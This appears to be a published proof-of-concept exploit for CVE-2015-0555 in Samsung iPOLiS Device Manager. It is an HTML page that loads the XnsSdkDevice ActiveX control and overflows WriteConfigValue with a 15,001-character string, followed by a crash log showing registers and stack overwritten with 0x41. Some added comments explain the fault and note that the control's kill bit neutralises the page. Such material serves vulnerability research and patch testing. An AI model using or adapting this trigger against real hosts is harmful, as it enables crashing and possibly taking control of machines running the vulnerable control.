<!--
|
|
# Exploit Title: (0day)Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555)
|
|
# Date: 22/02/2015
|
|
# Exploit Author: Praveen Darshanam
|
|
# Vendor Homepage: https://www.samsung-security.com/Tools/device-manager.aspx
|
|
# Version: Samsung iPOLiS 1.12.2
|
|
# Tested on: Windows 7 Ultimate N SP1
|
|
# CVE: 2015-0555
|
|
-->
|
|
|
|
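<!doctype html>
<html lang="en">
<!--
Vulnerability found and PoC coded by Praveen Darshanam
http://blog.disects.com
CVE-2015-0555
targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
prototype = "Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long"
memberName = "WriteConfigValue"
progid = "XNSSDKDEVICELib.XnsSdkDevice"
Operating System = Windows 7 Ultimate N SP1
Vulnerable Software = Samsung iPOLiS 1.12.2
CERT tried to coordinate but there wasn't any response from Samsung
-->
<head>
  <meta charset="utf-8">
  <!-- The original file placed this text directly inside <head>, which is invalid
       markup; it belongs in <title>. -->
  <title>Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC</title>
</head>
<body>
  <!-- The vulnerable control is instantiated by CLSID. The page only does anything on a
       host where the control is installed and the browser still permits scripting of
       ActiveX objects; setting the kill bit for this CLSID (or removing the control)
       neutralises the page. -->
  <object classid="clsid:D3B78638-78BA-4587-88FE-0537A0825A72" id="target"></object>
  <script>
    // Crash trigger: 15001 bytes of 0x41 are passed as szKey to WriteConfigValue.
    // The crash log in the comment at the end of this file shows 0x41414141 in the
    // "Called From / Returns To" chain, EDX = 0x00414141 at the faulting
    // MOV AL,[ESI+EDX], and EBP pointing at "AAAA..." -- consistent with the key
    // overrunning a stack buffer. The copy routine itself is not shown in the log.
    var arg1 = "";
    var arg2 = "praveend";
    // `var` added: the original loop assigned `i` as an implicit global.
    for (var i = 0; i <= 15000; i++) {
      arg1 += "A";
    }
    target.WriteConfigValue(arg1, arg2);
  </script>
</body>
</html>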
|
|
|
|
<!--
|
|
#############Stack Trace####################
|
|
Exception Code: ACCESS_VIOLATION
|
|
Disasm: 149434 MOV AL,[ESI+EDX]
|
|
|
|
Seh Chain:
|
|
--------------------------------------------------
|
|
1 647C7D7D mfc100.dll
|
|
2 647D0937 mfc100.dll
|
|
3 64E242CA VBSCRIPT.dll
|
|
4 77B3E0ED ntdll.dll
|
|
|
|
|
|
Called From Returns To
|
|
--------------------------------------------------
|
|
XNSSDKDEVICE.149434 41414141
|
|
41414141 414141
|
|
414141 3DA4C4
|
|
3DA4C4 mfc100.647790C1
|
|
mfc100.647790C1 56746C75
|
|
|
|
|
|
Registers:
|
|
--------------------------------------------------
|
|
EIP 00149434
|
|
EAX 00003841
|
|
EBX 00609FB0 -> 0015A564
|
|
ECX 00003814
|
|
EDX 00414141
|
|
EDI 0000008F
|
|
ESI 0000008F
|
|
EBP 002BE5FC -> Asc: AAAAAAAAAAA
|
|
ESP 002BE564 -> 0000000C
|
|
|
|
|
|
Block Disassembly:
|
|
--------------------------------------------------
|
|
149423 XOR EDI,EDI
|
|
149425 XOR ESI,ESI
|
|
149427 MOV [EBP-8C],ECX
|
|
14942D TEST ECX,ECX
|
|
14942F JLE SHORT 00149496
|
|
149431 MOV EDX,[EBP+8]
|
|
149434 MOV AL,[ESI+EDX] <--- CRASH
|
|
149437 CMP AL,2F
|
|
149439 JNZ SHORT 00149489
|
|
14943B MOV ECX,EBX
|
|
14943D TEST ESI,ESI
|
|
14943F JNZ SHORT 0014944D
|
|
149441 PUSH 159F28
|
|
149446 CALL 0014F7C0
|
|
14944B JMP SHORT 00149476
|
|
|
|
|
|
ArgDump:
|
|
--------------------------------------------------
|
|
EBP+8 00414141
|
|
EBP+12 003DA4C4 -> Asc: defaultV
|
|
EBP+16 647790C1 -> EBE84589
|
|
EBP+20 FFFFFFFE
|
|
EBP+24 646CBE5C -> CCCCCCC3
|
|
EBP+28 0000001C
|
|
|
|
|
|
Stack Dump:
|
|
--------------------------------------------------
|
|
2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00 [................]
|
|
2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41 [................]
|
|
2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
|
|
2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
|
|
2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
|
|
|
|
-->